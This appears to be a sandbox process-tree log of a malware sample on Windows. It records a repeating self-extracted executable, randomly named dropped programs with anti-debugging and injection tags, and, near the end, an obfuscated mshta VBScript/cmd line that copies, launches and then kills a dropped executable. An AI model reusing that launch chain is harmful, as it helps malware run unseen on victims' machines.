C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
411⤵
PID:8128

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
412⤵
PID:1388

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
413⤵
PID:7680

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
414⤵
PID:6296

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
415⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
416⤵
PID:1596

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
417⤵
PID:7900

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
418⤵
PID:7064

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
419⤵
PID:2308

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
420⤵
PID:7916

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
421⤵
PID:6368

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
422⤵
PID:7104

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
423⤵
PID:2832

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
424⤵
PID:5296

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
425⤵
PID:4704

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
426⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
427⤵
PID:6036

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
428⤵
PID:2844

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
429⤵
PID:3136

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
430⤵
PID:6304

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
431⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
432⤵
PID:8160

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
433⤵
PID:6624

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
434⤵
PID:7672

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
435⤵
PID:2136

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
436⤵
PID:7764

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
437⤵
PID:4572

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
438⤵
PID:7216

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
439⤵
PID:7832

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
440⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
441⤵
PID:4044

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
442⤵
PID:796

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
443⤵
PID:7364

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
444⤵
PID:8180

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
445⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
446⤵
PID:7004

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
447⤵
PID:4852

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
448⤵
PID:3432

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
449⤵
PID:2676

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
450⤵
PID:1752

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
451⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
452⤵
PID:1636

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
453⤵
PID:7200

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
454⤵
PID:1280

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
455⤵
PID:2172

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
456⤵
PID:7760

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
457⤵
PID:8124

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
458⤵
PID:232

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
459⤵
PID:8052

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
460⤵
PID:980

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
461⤵
PID:7656

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
462⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
463⤵
PID:5744

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
464⤵
PID:4960

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
465⤵
PID:1488

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
466⤵
PID:7792

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
467⤵
PID:5988

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
468⤵
PID:5652

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
469⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
470⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
471⤵
PID:1408

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
472⤵
PID:7120

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
473⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
474⤵
PID:5828

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
475⤵
PID:8100

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
476⤵
PID:6520

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
477⤵
PID:4724

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
478⤵
PID:4188

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
479⤵
PID:1276

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
480⤵
PID:820

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
481⤵
PID:1620

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
482⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
483⤵
PID:2920

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
484⤵
PID:2976

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
485⤵
PID:5352

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
486⤵
PID:7568

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
487⤵
PID:7056

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
488⤵
PID:6824

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
489⤵
PID:1932

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
490⤵
PID:1600

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
491⤵
PID:7232

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
492⤵
PID:1228

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
493⤵
PID:7820

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
494⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
495⤵
PID:8088

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
496⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
497⤵
PID:1344

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
498⤵
PID:492

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
499⤵
PID:6456

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
500⤵
PID:2836

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
501⤵
PID:1000

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
502⤵
PID:5448

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
503⤵
PID:7628

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
504⤵
PID:5696

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
505⤵
PID:680

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
506⤵
PID:7044

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
507⤵
PID:6860

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
508⤵
PID:6980

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
509⤵
PID:4088

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
510⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
511⤵
PID:6444

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
512⤵
PID:5700

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
513⤵
PID:692

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
514⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
515⤵
PID:3044

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
516⤵
PID:6192

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
517⤵
PID:5128

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
518⤵
PID:7020

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
519⤵
PID:7252

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
520⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:688

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
521⤵
PID:3864

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
522⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
523⤵
PID:1716

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
524⤵
PID:4420

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
525⤵
PID:5312

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
526⤵
PID:2844

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
527⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
528⤵
PID:3872

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
529⤵
PID:7672

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
530⤵
PID:2164

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
531⤵
PID:6524

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
532⤵
PID:6664

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
533⤵
PID:7552

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
534⤵
PID:6692

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
535⤵
PID:2476

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
536⤵
PID:3692

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
537⤵
PID:7464

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
538⤵
PID:7716

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
539⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
540⤵
PID:5248

C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
9⤵
- Runs ping.exe
PID:7064

C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
5⤵
PID:3352

C:\Users\Admin\Documents\mqRjspOZBJbxgOFTsAgPXGCB.exe
"C:\Users\Admin\Documents\mqRjspOZBJbxgOFTsAgPXGCB.exe"
6⤵
PID:6760

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\mqRjspOZBJbxgOFTsAgPXGCB.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\mqRjspOZBJbxgOFTsAgPXGCB.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
7⤵
PID:1516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\mqRjspOZBJbxgOFTsAgPXGCB.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\mqRjspOZBJbxgOFTsAgPXGCB.exe" ) do taskkill -f -iM "%~NxA"
8⤵
PID:7352

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "mqRjspOZBJbxgOFTsAgPXGCB.exe"
9⤵
- Kills process with taskkill
PID:7500

C:\Users\Admin\Documents\dJAXwFlQ_p1eBxEzGkshpYD5.exe
"C:\Users\Admin\Documents\dJAXwFlQ_p1eBxEzGkshpYD5.exe"
6⤵
PID:6752

C:\Users\Admin\Documents\dJAXwFlQ_p1eBxEzGkshpYD5.exe
"C:\Users\Admin\Documents\dJAXwFlQ_p1eBxEzGkshpYD5.exe" -q
7⤵
PID:7916

C:\Users\Admin\Documents\_xN54NnZnomRPATzFDYJ4i8H.exe
"C:\Users\Admin\Documents\_xN54NnZnomRPATzFDYJ4i8H.exe"
6⤵
PID:6744

C:\Users\Admin\Documents\_xN54NnZnomRPATzFDYJ4i8H.exe
"C:\Users\Admin\Documents\_xN54NnZnomRPATzFDYJ4i8H.exe"
7⤵
PID:3224

C:\Users\Admin\Documents\fKChJMClfqj7N4Je4TYLEvcQ.exe
"C:\Users\Admin\Documents\fKChJMClfqj7N4Je4TYLEvcQ.exe"
6⤵
PID:6736

C:\Users\Admin\Documents\X_0Ewh1KUS9BEn0y8fuUPvNW.exe
"C:\Users\Admin\Documents\X_0Ewh1KUS9BEn0y8fuUPvNW.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6728

C:\Users\Admin\Documents\6FWmm9wpbXfJihzhNLJ_cHvs.exe
"C:\Users\Admin\Documents\6FWmm9wpbXfJihzhNLJ_cHvs.exe"
6⤵
PID:6720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 280
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7524

C:\Users\Admin\Documents\fb1MwdKd5fEQv7VBUE8qPTBH.exe
"C:\Users\Admin\Documents\fb1MwdKd5fEQv7VBUE8qPTBH.exe"
6⤵
- Suspicious use of SetThreadContext
PID:6712

C:\Users\Admin\Documents\fb1MwdKd5fEQv7VBUE8qPTBH.exe
C:\Users\Admin\Documents\fb1MwdKd5fEQv7VBUE8qPTBH.exe
7⤵
PID:8116

C:\Users\Admin\Documents\ADKwMULHmhitEvLeGmKUceKo.exe
"C:\Users\Admin\Documents\ADKwMULHmhitEvLeGmKUceKo.exe"
6⤵
- Loads dropped DLL
PID:6704

C:\Users\Admin\Documents\Cor5FBLHqNIlclEqub8T9FPt.exe
"C:\Users\Admin\Documents\Cor5FBLHqNIlclEqub8T9FPt.exe"
6⤵
- Drops file in Program Files directory
PID:6696

C:\Users\Admin\Documents\8Ryys6MULaAOMhueUmcwsYqm.exe
"C:\Users\Admin\Documents\8Ryys6MULaAOMhueUmcwsYqm.exe"
6⤵
PID:6688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 312
7⤵
- Program crash
